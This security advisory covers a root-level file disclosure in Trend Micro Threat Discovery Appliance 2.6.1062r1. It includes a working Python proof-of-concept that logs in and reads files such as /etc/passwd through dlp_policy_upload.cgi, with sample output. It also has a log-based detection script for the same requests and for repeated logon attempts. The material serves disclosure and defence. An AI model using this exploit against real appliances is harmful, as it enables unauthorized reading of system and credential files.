Trend Micro Threat Discovery Appliance 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure

20 Apr 2017 | Reported by Roberto Suggi Liverani | Type: packetstorm | Source: packetstormsecurity.com

Trend Micro Threat Discovery Appliance 2.6.1062r1 dlp_policy_upload.cgi information disclosure vulnerability: a post-authentication file disclosure, combined with weak authentication and no file protection.

```python
#!/usr/local/bin/python
"""
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/
File: TDA_InstallationCD.2.6.1062r1.en_US.iso
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1

Summary:
========

There exists a post authenticated file disclosure vulnerability that can be used to leak files as root.

Notes:
======

- Auth is VERY weak, no privilege separation, no username required, no password policy, no protection from bruteforce attempts...

Example:
========

saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py
(+) usage: ./poc.py <target> <pass> <file>
(+) eg: ./poc.py 172.16.175.123 admin /etc/passwd
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py 172.16.175.123 admin123 /etc/passwd
(+) logged in...
(+) downloading file...
root:x:0:0:root:/root:/bin/true
tda:x:1:1:nobody:/:/bin/true
monitor:x:1:1:nobody:/:/bin/true
pcap:x:77:77:tcpdump:/var/log:/bin/true
saturn:trend_micro_threat_discovery_dlp_policy_upload_lfd mr_me$ ./poc.py 172.16.175.123 admin123 /var/i_dont_exist
(+) logged in...
(+) downloading file...
(-) file: /var/i_dont_exist doesnt exist!
"""

import re
import sys
import requests

requests.packages.urllib3.disable_warnings()

def remove_last_line_from_string(s):
    return s[:s.rfind('\r\n')]

def download_file():
    r = s.get("https://%s/cgi-bin/dlp_policy_upload.cgi?Q_UPLOAD_ID=1&Q_UPLOAD_TEMPLATE=%s" % (t, f), verify=False)
    data = r.text
    if len(data) > 52:
        fdata = str(data).split("\n")
        fdata.pop()
        fdata.pop()
        print '\n'.join(fdata)
    else:
        print "(-) file: %s doesnt exist!" % f

if len(sys.argv) != 4:
    print "(+) usage: %s <target> <pass> <file>" % sys.argv[0]
    print "(+) eg: %s 172.16.175.123 admin /etc/passwd" % sys.argv[0]
    sys.exit(-1)

t = sys.argv[1]
p = sys.argv[2]
f = sys.argv[3]

bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu

s = requests.Session()

r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
if "frame.cgi" in r.text:
    print "(+) logged in..."
    print "(+) downloading file..."
    download_file()
```
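A defender-side check for the two request patterns the PoC above produces (repeated `logon.cgi` POSTs and a `dlp_policy_upload.cgi` request whose `Q_UPLOAD_TEMPLATE` is a filesystem path), as an added Python 3 example that is not part of the original advisory. The access-log layout, the sample lines, the function names and the rule that a legitimate `Q_UPLOAD_TEMPLATE` is never an absolute or parent-relative path are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Apache combined-style format (assumed log layout).
SAMPLE_LOG = """\
10.0.0.5 - - [20/Apr/2017:10:00:01 +0000] "POST /cgi-bin/logon.cgi HTTP/1.1" 200 512
10.0.0.5 - - [20/Apr/2017:10:00:02 +0000] "POST /cgi-bin/logon.cgi HTTP/1.1" 200 512
10.0.0.5 - - [20/Apr/2017:10:00:03 +0000] "POST /cgi-bin/logon.cgi HTTP/1.1" 200 2048
10.0.0.5 - - [20/Apr/2017:10:00:04 +0000] "GET /cgi-bin/dlp_policy_upload.cgi?Q_UPLOAD_ID=1&Q_UPLOAD_TEMPLATE=/etc/passwd HTTP/1.1" 200 260
10.0.0.9 - - [20/Apr/2017:10:05:00 +0000] "GET /cgi-bin/dlp_policy_upload.cgi?Q_UPLOAD_ID=1&Q_UPLOAD_TEMPLATE=%2Fetc%2Fpasswd HTTP/1.1" 200 260
10.0.0.7 - - [20/Apr/2017:10:06:00 +0000] "POST /cgi-bin/logon.cgi HTTP/1.1" 200 2048
10.0.0.7 - - [20/Apr/2017:10:06:05 +0000] "GET /cgi-bin/frame.cgi HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} ')

def requests_in(log_text):
    """Yield (client, method, parsed URL) for each parseable log line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2), urlsplit(m.group(3))

def file_read_attempts(log_text):
    """Return (client, decoded path) where Q_UPLOAD_TEMPLATE names a filesystem path."""
    hits = []
    for client, _method, url in requests_in(log_text):
        if not url.path.endswith("/cgi-bin/dlp_policy_upload.cgi"):
            continue
        # parse_qs percent-decodes, so encoded paths are compared in plain form.
        for value in parse_qs(url.query).get("Q_UPLOAD_TEMPLATE", []):
            if value.startswith("/") or ".." in value.split("/"):
                hits.append((client, value))
    return hits

def logon_bursts(log_text, threshold=3):
    """Return {client: count} for clients with >= threshold logon.cgi POSTs."""
    counts = Counter(client for client, method, url in requests_in(log_text)
                     if method == "POST" and url.path.endswith("/cgi-bin/logon.cgi"))
    return {client: n for client, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    print(file_read_attempts(SAMPLE_LOG))
    print(logon_bursts(SAMPLE_LOG))
```

The burst count here has no time window; in production, bucket by minute and tune the threshold to the appliance's normal admin traffic.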

Vulners AI Score: 9.6 (High risk) | EPSS: 0.89354